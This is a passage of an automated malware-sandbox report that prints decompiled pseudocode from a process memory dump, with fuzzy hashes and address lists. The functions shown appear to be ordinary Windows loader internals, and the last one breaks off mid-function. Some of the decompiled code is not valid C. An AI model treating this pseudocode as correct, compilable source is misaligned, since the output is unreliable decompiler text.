Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc993876e2153c9736979f552afea7e8a4267a965e5ed13276f5769fa9e890e1
Instruction ID: 999578e15db88b1621ff6793bba28d561b3b5b069612caf44b4770ff3c123380
Opcode Fuzzy Hash: bc993876e2153c9736979f552afea7e8a4267a965e5ed13276f5769fa9e890e1
Instruction Fuzzy Hash: 12A17A75900615BFEB229F64DC55BAE77BAEF49714F000458FA00AB2A0D779BC10DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04CB82E0 Relevance: .3, Instructions: 281
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04CB82E0(intOrPtr _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				char _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed short* _v92;
				intOrPtr _v96;
				signed int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				signed short* _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v192;
				signed int _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				signed short* _v220;
				intOrPtr _v224;
				signed int _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				signed short* _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				char _v268;
				signed int _v272;
				signed int _v276;
				signed short _v280;
				signed short _v284;
				signed int _v288;
				signed int _v292;
				intOrPtr* _v296;
				signed short _v300;
				signed short _v304;
				signed int _v308;
				void* _v324;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t142;
				signed int _t144;
				intOrPtr _t153;
				void* _t154;
				signed int _t155;
				signed int _t162;
				signed short _t163;
				signed int _t166;
				signed short _t167;
				signed int _t172;
				signed int _t186;
				signed short _t187;
				signed int _t190;
				signed short _t191;
				intOrPtr _t196;
				signed int _t197;
				signed int _t200;
				signed int* _t201;
				signed int _t203;
				void* _t204;
				intOrPtr* _t205;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr* _t212;
				signed int _t213;
				intOrPtr* _t216;
				intOrPtr* _t224;
				signed int _t225;
				intOrPtr* _t229;
				void* _t233;
				signed int _t239;
				void* _t240;
				void* _t241;
				intOrPtr* _t242;
				intOrPtr* _t243;
				intOrPtr* _t245;
				void* _t246;
				intOrPtr* _t247;
				signed int _t249;
				signed int _t251;
				void* _t252;

				_t251 = (_t249 & 0xfffffff8) - 0x134;
				_v8 =  *0x4dab370 ^ _t251;
				_t203 = _a12;
				_t142 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_t245 =  *((intOrPtr*)(_t203 + 8));
				if(_t142 == 0) {
					L24:
					_t235 = _t203;
					E04D8629A(_t245, _t203, __eflags);
					L10:
					_t239 = _a16;
					if(_t239 >=  *((intOrPtr*)(_t245 + 0xc))) {
						L22:
						_t144 = 0;
						L19:
						_pop(_t240);
						_pop(_t246);
						_pop(_t204);
						return E04CF4B50(_t144, _t204, _v8 ^ _t251, _t235, _t240, _t246);
					}
					asm("lfence");
					_t205 =  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0x10)) + 4 + _t239 * 4));
					E04CF8F40( &_v268, 0, 0x80);
					_v276 = 0;
					_t252 = _t251 + 0xc;
					_v272 = 0;
					_v304 = 0;
					_v300 = 0;
					if( *((intOrPtr*)(_t205 + 0x18)) == 0 || E04CB8470( &_v276) == 0) {
						L13:
						_t247 =  *((intOrPtr*)(_t245 + 0x10 + _t239 * 4));
						_v296 = _t247;
						E04CF8F40( &_v60, 0, 0x30);
						_t251 = _t252 + 0xc;
						if( *((intOrPtr*)(_t247 + 0x18)) == 0) {
							L18:
							_t144 =  *((intOrPtr*)(_t247 + 4));
							goto L19;
						}
						_v292 = 0;
						_v288 = 0;
						_t153 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
						if(_t153 == 0) {
							goto L18;
						}
						_t154 = _t153 + 0x7e0;
						if(_t154 == 0) {
							goto L18;
						}
						_t241 = _t154 + 0x30;
						if( *((intOrPtr*)(_t154 + 0x30)) == 0 ||  *((intOrPtr*)(_t154 + 0xc)) == 0) {
							goto L18;
						} else {
							_t206 =  *(_t154 + 0x10);
							_t155 = _t154 + 0x10;
							_v308 = _t155;
							_t235 =  *(_t155 + 4);
							__eflags = _t206 | _t235;
							if((_t206 | _t235) != 0) {
								L37:
								__eflags = _t206 | _t235;
								if((_t206 | _t235) == 0) {
									goto L18;
								}
								_t242 =  *_t247;
								_t212 = _t242;
								_v140 = _t247 + 0x60;
								_v136 = 0;
								_v132 = 0x10;
								_v128 = 0;
								_t107 = _t212 + 2; // 0x2
								_v296 = _t107;
								do {
									_t162 =  *_t212;
									_t212 = _t212 + 2;
									__eflags = _t162;
								} while (_t162 != 0);
								_t213 = _t212 - _v296;
								__eflags = _t213;
								_v108 = _t242;
								_t243 =  *((intOrPtr*)(_t247 + 0xc));
								_v120 = 0;
								_t163 = 2 + (_t213 >> 1) * 2;
								_v116 = 2;
								_v284 = _t163;
								_v124 =  &_v284;
								_t216 = _t243;
								_v100 = _t163 & 0x0000ffff;
								_v112 = 0;
								_t121 = _t216 + 2; // 0x2
								_v104 = 0;
								_v96 = 0;
								_v296 = _t121;
								do {
									_t166 =  *_t216;
									_t216 = _t216 + 2;
									__eflags = _t166;
								} while (_t166 != 0);
								_v88 = 0;
								_v84 = 2;
								_v80 = 0;
								_t167 = 2 + (_t216 - _v296 >> 1) * 2;
								_v76 = _t243;
								_v280 = _t167;
								_v68 = _t167 & 0x0000ffff;
								_v92 =  &_v280;
								_v72 = 0;
								_v64 = 0;
								E04CE1280(_t206, _t206, _t235, 0x4c86970, 5,  &_v140);
								goto L18;
							}
							_t172 = E04CAE0E0(0x4c8694c, 0, 0,  &_v292);
							__eflags = _t172;
							if(_t172 != 0) {
								goto L18;
							}
							asm("lock cmpxchg8b [esi]");
							_t247 = _v296;
							_t206 = _t172;
							_v308 = 0;
							__eflags = _t172;
							if(_t172 == 0) {
								__eflags = 0;
								_t206 = _v292;
								_v308 = _v288;
								E04D85F48(_t241, 0, _v292, _v288,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							} else {
								E04CD9A00(0, _v292, _v288, 0);
							}
							_t235 = _v308;
							goto L37;
						}
					} else {
						_t235 = _v276;
						__eflags = _t235 | _v272;
						if((_t235 | _v272) == 0) {
							goto L13;
						}
						_t224 =  *_t205;
						_v268 = _t205 + 0x20;
						_v264 = 0;
						_v260 = 0x10;
						_v256 = 0;
						_v308 = _t224 + 2;
						do {
							_t186 =  *_t224;
							_t224 = _t224 + 2;
							__eflags = _t186;
						} while (_t186 != 0);
						_t225 = _t224 - _v308;
						__eflags = _t225;
						_v248 = 0;
						_v244 = 2;
						_v240 = 0;
						_t187 = 2 + (_t225 >> 1) * 2;
						_v232 = 0;
						_v304 = _t187;
						_v252 =  &_v304;
						_t208 =  *((intOrPtr*)(_t205 + 4));
						_v236 =  *_t205;
						_t229 = _t208;
						_v228 = _t187 & 0x0000ffff;
						_v224 = 0;
						_v308 = _t229 + 2;
						do {
							_t190 =  *_t229;
							_t229 = _t229 + 2;
							__eflags = _t190;
						} while (_t190 != 0);
						_v216 = 0;
						_v212 = 2;
						_v208 = 0;
						_t191 = 2 + (_t229 - _v308 >> 1) * 2;
						_v204 = _t208;
						_v300 = _t191;
						_v196 = _t191 & 0x0000ffff;
						_v220 =  &_v300;
						_v200 = 0;
						_v192 = 0;
						E04CE1280(_t208, _t235, _v272, 0x4c86960, 5,  &_v268);
						goto L13;
					}
				}
				_t233 = _t142 + 0x7e0;
				if(_t233 == 0 ||  *((intOrPtr*)(_t233 + 0x30)) == 0) {
					goto L24;
				} else {
					_t196 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t196 == 0) {
						L23:
						_t235 = 0;
						_t197 = 0;
						L7:
						if(_t235 !=  *_t245 || _t197 !=  *((intOrPtr*)(_t245 + 4))) {
							_t198 = _a8;
							goto L21;
						} else {
							_t198 = _a8;
							if(_a8 !=  *((intOrPtr*)(_t245 + 8))) {
								L21:
								_t235 = _t203;
								_t200 = E04CB84D8(_t245, _t203, __eflags, _t233 + 0x18, _t198);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L10;
								}
								goto L22;
							}
							goto L10;
						}
					}
					_t201 = _t196 + 0x7e0;
					if(_t201 == 0 || _t201[0xc] == 0) {
						goto L23;
					} else {
						_t235 =  *_t201;
						_t197 = _t201[1];
						goto L7;
					}
				}
			}

0x04cb82e8
0x04cb82f5
0x04cb8303
0x04cb8307
0x04cb830e
0x04cb8313
0x04d11b00
0x04d11b00
0x04d11b04
0x04cb837c
0x04cb837c
0x04cb8382
0x04cb8467
0x04cb8467
0x04cb8437
0x04cb843e
0x04cb843f
0x04cb8440
0x04cb844b
0x04cb844b
0x04cb8388
0x04cb8395
0x04cb839e
0x04cb83a5
0x04cb83ad
0x04cb83b0
0x04cb83b8
0x04cb83bd
0x04cb83c5
0x04cb83d8
0x04cb83d8
0x04cb83e8
0x04cb83ec
0x04cb83f1
0x04cb83f8
0x04cb8434
0x04cb8434
0x00000000
0x04cb8434
0x04cb8400
0x04cb8408
0x04cb8410
0x04cb8418
0x00000000
0x00000000
0x04cb841a
0x04cb841f
0x00000000
0x00000000
0x04cb8425
0x04cb8428
0x00000000
0x04d11c28
0x04d11c28
0x04d11c2b
0x04d11c2e
0x04d11c32
0x04d11c37
0x04d11c39
0x04d11cc1
0x04d11cc3
0x04d11cc5
0x00000000
0x00000000
0x04d11ccb
0x04d11cd0
0x04d11cd2
0x04d11cd9
0x04d11ce4
0x04d11cef
0x04d11cfa
0x04d11cfd
0x04d11d01
0x04d11d01
0x04d11d04
0x04d11d07
0x04d11d07
0x04d11d0c
0x04d11d0c
0x04d11d12
0x04d11d19
0x04d11d1c
0x04d11d27
0x04d11d2e
0x04d11d3d
0x04d11d42
0x04d11d49
0x04d11d4e
0x04d11d55
0x04d11d60
0x04d11d63
0x04d11d6e
0x04d11d79
0x04d11d7d
0x04d11d7d
0x04d11d80
0x04d11d83
0x04d11d83
0x04d11d8e
0x04d11d99
0x04d11da4
0x04d11daf
0x04d11db6
0x04d11dbd
0x04d11dc9
0x04d11de1
0x04d11de8
0x04d11df3
0x04d11dfe
0x00000000
0x04d11dfe
0x04d11c4d
0x04d11c52
0x04d11c54
0x00000000
0x00000000
0x04d11c69
0x04d11c6d
0x04d11c73
0x04d11c75
0x04d11c79
0x04d11c7b
0x04d11c93
0x04d11c95
0x04d11c9b
0x04d11cb8
0x04d11c7d
0x04d11c88
0x04d11c88
0x04d11cbd
0x00000000
0x04d11cbd
0x04d11b0e
0x04d11b0e
0x04d11b14
0x04d11b18
0x00000000
0x00000000
0x04d11b1e
0x04d11b23
0x04d11b27
0x04d11b2f
0x04d11b3a
0x04d11b42
0x04d11b46
0x04d11b46
0x04d11b49
0x04d11b4c
0x04d11b4c
0x04d11b51
0x04d11b51
0x04d11b57
0x04d11b5f
0x04d11b67
0x04d11b6f
0x04d11b76
0x04d11b82
0x04d11b87
0x04d11b8d
0x04d11b90
0x04d11b94
0x04d11b99
0x04d11b9d
0x04d11ba8
0x04d11bac
0x04d11bac
0x04d11baf
0x04d11bb2
0x04d11bb2
0x04d11bbd
0x04d11bc5
0x04d11bcd
0x04d11bd5
0x04d11bdc
0x04d11be0
0x04d11bec
0x04d11c03
0x04d11c08
0x04d11c13
0x04d11c1e
0x00000000
0x04d11c1e
0x04cb83c5
0x04cb8319
0x04cb8321
0x00000000
0x04cb8331
0x04cb8337
0x04cb833f
0x04d11af7
0x04d11af7
0x04d11af9
0x04cb835f
0x04cb8361
0x04cb844e
0x00000000
0x04cb8370
0x04cb8370
0x04cb8376
0x04cb8451
0x04cb8455
0x04cb845a
0x04cb845f
0x04cb8461
0x00000000
0x00000000
0x00000000
0x04cb8461
0x00000000
0x04cb8376
0x04cb8361
0x04cb8345
0x04cb834a
0x00000000
0x04cb835a
0x04cb835a
0x04cb835c
0x00000000
0x04cb835c
0x04cb834a

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86dcf29a26b2e61525f80b4106b372bc892181b9325f752e16180814f892531c
Instruction ID: 5bcb681e2dcbcfdd031b9f97a2bee9f1f2f4a2d04c5f59eb1ae7b866f5648d4a
Opcode Fuzzy Hash: 86dcf29a26b2e61525f80b4106b372bc892181b9325f752e16180814f892531c
Instruction Fuzzy Hash: 1CC138742083819FD764DF19C494BABB7E5FF88304F44496DE98987291E774EA08CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 04CAC3C7 Relevance: .3, Instructions: 280
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E04CAC3C7(signed int __ecx) {
				signed int _v8;
				char _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				short _v208;
				signed int _v210;
				short _v212;
				short _v214;
				char _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				char _v240;
				signed int _v244;
				intOrPtr _v248;
				char _v252;
				char* _v256;
				short _v258;
				char _v260;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t120;
				signed int _t123;
				void* _t127;
				signed int _t141;
				signed char _t142;
				signed int _t145;
				signed int _t153;
				void* _t161;
				short _t162;
				signed int _t177;
				void* _t178;
				void* _t179;
				signed int _t181;
				intOrPtr _t188;
				signed int _t191;
				signed int _t198;
				signed int _t201;
				signed int _t210;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t225;
				void* _t226;
				void* _t227;
				signed int _t228;
				signed int _t229;

				_v8 =  *0x4dab370 ^ _t229;
				_t228 = __ecx;
				_v220 = 0;
				_t225 = _t224 | 0xffffffff;
				_v228 = 0;
				_v244 = 0;
				_t177 = _t225;
				_v224 = _t177;
				_v236 = _t225;
				E04CF8F40( &_v188, 0, 0xaa);
				_t120 = E04CF39E0();
				asm("sbb al, al");
				_v240 =  ~_t120 + 1;
				_t123 =  *(_t228 + 4) & 0x0000ffff;
				if(_t123 == 0) {
					_push( &_v220);
					if(E04CF3EB0() < 0) {
						goto L31;
					}
					_t123 = _v220;
					goto L2;
				} else {
					_v220 = _t123;
					L2:
					_t187 = _t228;
					_t127 = E04CD5004(_t228, _t123, 0,  &_v236);
					if(_t127 == 0xc0000034 || _t127 == 0xc00000bb) {
						_t210 = 0x55;
						_v232 = _t225;
						_t188 = E04CAD818(_t187, _t210);
						_v244 = _t188;
						if(_t188 != 0) {
							_v248 = _t188;
							_v252 = 0xaa0000;
							if(E04CD4F40(_v220 & 0x0000ffff,  &_v252) == 0) {
								goto L11;
							}
							_t161 = E04CAD853( &_v232, _t228, _v248, 1,  &_v232);
							_t201 = _t225;
							if(_t161 >= 0) {
								_t201 = _v232;
							}
							_t162 = 0x31;
							_v216 = _t162;
							_v210 = _t201;
							_v214 = 0;
							_v212 = _v220;
							_v208 = 0;
							_v204 = 0;
							_v200 = 0;
							_v196 = 0;
							_v192 = 0;
							E04CACB1E(_t228,  &_v216, _v248);
							_t73 = _t228 + 0x14; // 0x16
							if(L04CEA775(_t73,  &_v216, 0) < 0) {
								goto L11;
							} else {
								_t168 =  *(_t228 + 0x14);
								_t177 = ( *( *(_t228 + 0x14) + 6) & 0x0000ffff) - 1;
								goto L6;
							}
						}
						_t125 = 0xc0000017;
						goto L31;
					} else {
						if(_t127 < 0) {
							L11:
							if(_v240 != 0) {
								_t225 = _t177 & 0x0000ffff;
							}
							_t210 = _t225;
							E04CAC5CA(_t228, _t210);
							_t191 =  *(_t228 + 0x14);
							_t178 = 0;
							if(0 >=  *(_t191 + 6)) {
								L17:
								_t177 = 0;
								if(0 >=  *(_t191 + 6)) {
									L25:
									_t225 = 0;
									if(0 >=  *(_t191 + 6)) {
										L29:
										_t135 = _v244;
										if(_v244 != 0) {
											E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t135);
										}
										_t125 = 0;
										L31:
										return E04CF4B50(_t125, _t177, _v8 ^ _t229, _t210, _t225, _t228);
									}
									_t179 = 0;
									do {
										if(( *(_t179 +  *((intOrPtr*)(_t191 + 0xc))) & 0x00000004) != 0) {
											E04D6CF65(_t228, _t225);
											_t210 =  *(_t228 + 0x14);
										}
										_t225 = _t225 + 1;
										_t179 = _t179 + 0x1c;
										_t191 = _t210;
									} while (_t225 < ( *(_t210 + 6) & 0x0000ffff));
									goto L29;
								}
								_t214 = _t191;
								_t226 = 0;
								do {
									_t141 =  *((intOrPtr*)(_t214 + 0xc));
									_t191 = _t214;
									_v236 = _t141;
									_t142 =  *(_t141 + _t226) & 0x0000ffff;
									_v232 = _t142;
									if((_t142 & 0x00000021) == 0x21) {
										_t145 = _v232;
										if((_t145 & 0x00001000) == 0) {
											_v228 = _v228 + 1;
										}
										_t191 = _t214;
										if(_v240 != 0 && _t177 != _v224) {
											_t191 = _t214;
											if(_v228 >  *((intOrPtr*)(_t228 + 0x48))) {
												 *((short*)(_v236 + _t226)) = _t145 & 0x0000ffdf;
												 *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t226) =  *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t226) | 0x00008000;
												_t191 =  *(_t228 + 0x14);
											}
										}
									}
									_t177 = _t177 + 1;
									_t226 = _t226 + 0x1c;
									_t214 = _t191;
								} while (_t177 < ( *(_t191 + 6) & 0x0000ffff));
								goto L25;
							} else {
								_t216 = _t191;
								_t227 = 0;
								do {
									if(( *(_t227 +  *((intOrPtr*)(_t216 + 0xc))) & 0x00000022) == 0x22) {
										E04D6D16A(_t228, _t178);
										_t153 =  *(_t228 + 0x14);
										_t198 =  *((intOrPtr*)(_t153 + 0xc));
										_v232 = _t198;
										_t218 =  *(_t198 + _t227) & 0x0000ffff;
										if((_t218 & 0x00001000) == 0) {
											_v228 = _v228 + 1;
										}
										_t191 = _t153;
										if(_v240 != 0 && _t178 != _v224 && _v228 >  *((intOrPtr*)(_t228 + 0x48))) {
											 *((short*)(_v232 + _t227)) = _t218 & 0x0000ffdf;
											 *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t227) =  *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t227) | 0x00008000;
											_t191 =  *(_t228 + 0x14);
										}
									}
									_t178 = _t178 + 1;
									_t227 = _t227 + 0x1c;
									_t216 = _t191;
								} while (_t178 < ( *(_t191 + 6) & 0x0000ffff));
								goto L17;
							}
						} else {
							_t177 = _v236;
							_t168 =  *(_t228 + 0x14);
							L6:
							_v224 = _t177;
							if(_t177 == _t225) {
								goto L11;
							}
							_t181 = _t177 * 0x1c;
							_v256 =  &_v188;
							_v258 = 0xaa;
							if(E04CAC6A0(_t228,  *((intOrPtr*)(_t168 + 0xc)) + _t181,  &_v260) >= 0) {
								if(E04CD43AC(_t228, _v256) < 0) {
									 *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t181) =  *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t181) & 0x0000ffdf;
									 *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t181) =  *( *((intOrPtr*)( *(_t228 + 0x14) + 0xc)) + _t181) | 0x00008000;
								} else {
									_v228 = 1;
								}
							}
							_t177 = _v224;
							goto L11;
						}
					}
				}
			}

0x04cac3d9
0x04cac3e1
0x04cac3e8
0x04cac3f1
0x04cac3f4
0x04cac3fa
0x04cac400
0x04cac408
0x04cac40f
0x04cac416
0x04cac41e
0x04cac425
0x04cac429
0x04cac42f
0x04cac436
0x04d09ded
0x04d09df5
0x00000000
0x00000000
0x04d09dfb
0x00000000
0x04cac43c
0x04cac43c
0x04cac443
0x04cac44f
0x04cac451
0x04cac45b
0x04d09e09
0x04d09e0a
0x04d09e16
0x04d09e18
0x04d09e20
0x04d09e33
0x04d09e41
0x04d09e52
0x00000000
0x00000000
0x04d09e69
0x04d09e6e
0x04d09e73
0x04d09e75
0x04d09e75
0x04d09e7e
0x04d09e85
0x04d09e94
0x04d09e9b
0x04d09eab
0x04d09eb4
0x04d09ebb
0x04d09ec1
0x04d09ec7
0x04d09ecd
0x04d09ed3
0x04d09ed8
0x04d09eea
0x00000000
0x04d09ef0
0x04d09ef0
0x04d09ef7
0x00000000
0x04d09ef7
0x04d09eea
0x04d09e22
0x00000000
0x04cac46c
0x04cac46e
0x04cac4db
0x04cac4e2
0x04cac4e4
0x04cac4e4
0x04cac4e7
0x04cac4eb
0x04cac4f0
0x04cac4f5
0x04cac4fb
0x04cac521
0x04cac523
0x04cac529
0x04cac582
0x04cac584
0x04cac58a
0x04cac5ab
0x04cac5ab
0x04cac5b3
0x04d09fef
0x04d09fef
0x04cac5b9
0x04cac5bb
0x04cac5c9
0x04cac5c9
0x04cac58c
0x04cac58e
0x04cac597
0x04d09fd6
0x04d09fdb
0x04d09fdb
0x04cac5a1
0x04cac5a2
0x04cac5a5
0x04cac5a7
0x00000000
0x04cac58e
0x04cac52b
0x04cac52d
0x04cac52f
0x04cac52f
0x04cac532
0x04cac534
0x04cac53a
0x04cac53e
0x04cac548
0x04cac54a
0x04cac555
0x04cac557
0x04cac557
0x04cac564
0x04cac566
0x04d09f99
0x04d09fa4
0x04d09fb7
0x04d09fc6
0x04d09fca
0x04d09fca
0x04d09fa4
0x04cac566
0x04cac578
0x04cac579
0x04cac57c
0x04cac57e
0x00000000
0x04cac4fd
0x04cac4fd
0x04cac4ff
0x04cac501
0x04cac50d
0x04d09f24
0x04d09f29
0x04d09f2c
0x04d09f2f
0x04d09f35
0x04d09f3f
0x04d09f41
0x04d09f41
0x04d09f4e
0x04d09f50
0x04d09f83
0x04d09f8d
0x04d09f91
0x04d09f91
0x04d09f50
0x04cac517
0x04cac518
0x04cac51b
0x04cac51d
0x00000000
0x04cac501
0x04cac470
0x04cac470
0x04cac477
0x04cac47a
0x04cac47a
0x04cac482
0x00000000
0x00000000
0x04cac48a
0x04cac48d
0x04cac498
0x04cac4b4
0x04cac4c5
0x04d09f08
0x04d09f17
0x04cac4cb
0x04cac4cb
0x04cac4cb
0x04cac4c5
0x04cac4d5
0x00000000
0x04cac4d5
0x04cac46e
0x04cac45b

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f003bd65c0481b74296867b8e527eac12a79aeb939aabbaffe9247f933cc627f
Instruction ID: 1abeecd1010c5919ceefb8b308c4b22d61256836a978a9ef8e7d28e982795c5b
Opcode Fuzzy Hash: f003bd65c0481b74296867b8e527eac12a79aeb939aabbaffe9247f933cc627f
Instruction Fuzzy Hash: BAB17170A002568BDB74DF55C890BB9B3B2EF44704F0485EAE50AA7291EB74AEC5DF24

Uniqueness

Uniqueness Score: -1.00%

Function 04CDE507 Relevance: .3, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E04CDE507(intOrPtr* __ecx, intOrPtr* __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				char _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v88;
				signed int _t78;
				void* _t81;
				char* _t84;
				intOrPtr _t85;
				intOrPtr _t97;
				signed int _t100;
				signed int _t105;
				intOrPtr _t108;
				signed int _t116;
				signed int _t117;
				signed char* _t118;
				signed int _t125;
				signed int _t126;
				signed char* _t127;
				intOrPtr* _t131;
				char* _t132;
				intOrPtr* _t151;
				signed int _t152;
				intOrPtr _t153;
				signed int _t155;
				signed int _t156;

				_t151 = __ecx;
				_t131 = __edx;
				_v28 = __edx;
				_t153 =  *((intOrPtr*)(__ecx + 0x20));
				_v32 =  *((intOrPtr*)(__ecx + 0x60));
				if(E04CDE662(__ecx, 0) != 0) {
					return 0xc000022d;
				} else {
					_t135 =  *((intOrPtr*)(_t153 + 0x18));
					_t6 = _t153 + 0x24; // 0x123
					_t78 = _t6;
					_t146 = _t78;
					_v16 = _t78;
					E04CCDF36( *((intOrPtr*)(_t153 + 0x18)), _t146, 0x14a5);
					_v88 = 0x18;
					_v84 = 0;
					0x840 = 0x40;
					if( *0x4da5d58 != 0) {
					}
				}
				_v76 = 0x840;
				_v80 = _t131;
				_v72 = 0;
				_v68 = 0;
				_t81 = E04CC3C40();
				_t132 = 0x7ffe0384;
				if(_t81 != 0) {
					_t84 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t84 = 0x7ffe0384;
				}
				if( *_t84 != 0) {
					_t85 =  *[fs:0x30];
					__eflags =  *(_t85 + 0x240) & 0x00000004;
					if(( *(_t85 + 0x240) & 0x00000004) != 0) {
						_t126 = E04CC3C40();
						__eflags = _t126;
						if(_t126 == 0) {
							_t127 = 0x7ffe0385;
						} else {
							_t127 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						__eflags =  *_t127 & 0x00000020;
						if(( *_t127 & 0x00000020) != 0) {
							_t146 = _t146 | 0xffffffff;
							_t135 = 0x1485;
							E04D30227(0x1485, _t146, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				if(( *( *[fs:0x30] + 0x68) & 0x00040000) != 0) {
					_t135 = _v28;
					_push(0);
					_push(0);
					_push(0);
					_v48 =  *_t135;
					_v44 =  *((intOrPtr*)(_t135 + 4));
					_push(8);
					_push( &_v48);
					_push(0x26);
					E04CF4580();
				}
				_v24 = 0;
				while(1) {
					_push(0x60);
					_push(5);
					_push( &_v64);
					_push( &_v88);
					_push(0x100021);
					_push( &_v12);
					_t155 = E04CF2CE0();
					if(_t155 >= 0) {
						break;
					}
					__eflags = _t155 - 0xc0000034;
					if(_t155 == 0xc0000034) {
						L38:
						_t155 = 0xc0000135;
						L39:
						__eflags = _t155;
						if(_t155 < 0) {
							L19:
							return _t155;
						}
						break;
					}
					__eflags = _t155 - 0xc000003a;
					if(_t155 == 0xc000003a) {
						goto L38;
					}
					__eflags = _t155 - 0xc0000022;
					if(_t155 != 0xc0000022) {
						goto L39;
					}
					__eflags = _v24;
					if(__eflags != 0) {
						goto L19;
					}
					_t135 = _t151;
					_t125 = E04D2FBC2(_t151, __eflags);
					__eflags = _t125;
					if(_t125 == 0) {
						goto L19;
					}
					_v24 = 1;
				}
				if( *0x4da5d3c != 0) {
					_t146 = _v12;
					_t155 = E04D33ECC(_t151, _v12, _t135);
					__eflags = _t155;
					if(_t155 >= 0) {
						goto L10;
					}
					__eflags =  *0x4da5d10;
					if( *0x4da5d10 != 0) {
						L18:
						_push(_v12);
						E04CF2A80();
						goto L19;
					}
				}
				L10:
				if(( *(_t151 + 0x10) & 0x01000000) != 0) {
					_t97 =  *[fs:0x30];
					__eflags =  *(_t97 + 3) & 0x00000010;
					if(( *(_t97 + 3) & 0x00000010) != 0) {
						goto L11;
					}
					_t146 =  *(_t151 + 0x20);
					_t155 = E04D33E62(_v12,  *(_t151 + 0x20),  &_v36, 8,  &_v5);
					__eflags = _t155;
					if(_t155 < 0) {
						goto L18;
					}
				}
				L11:
				_push(_v12);
				_push(0x1000000);
				_push(0x10);
				_push(0);
				_push(0);
				_push(0xd);
				_push( &_v20);
				_t155 = E04CF2E50();
				if(_t155 < 0) {
					__eflags = _t155 - 0xc000047e;
					if(_t155 == 0xc000047e) {
						L56:
						_t100 = E04D2C3B0(_t155);
						_t152 = _v16;
						_t155 = _t100;
						L57:
						E04CEC98F(_t155, 0x1485, 0, _t152);
						goto L18;
					}
					__eflags = _t155 - 0xc000047f;
					if(_t155 == 0xc000047f) {
						goto L56;
					}
					__eflags = _t155 - 0xc0000462;
					if(_t155 == 0xc0000462) {
						goto L56;
					}
					_t152 = _v16;
					__eflags = _t155 - 0xc0000017;
					if(_t155 != 0xc0000017) {
						__eflags = _t155 - 0xc000009a;
						if(_t155 != 0xc000009a) {
							__eflags = _t155 - 0xc000012d;
							if(_t155 != 0xc000012d) {
								_v56 = _t152;
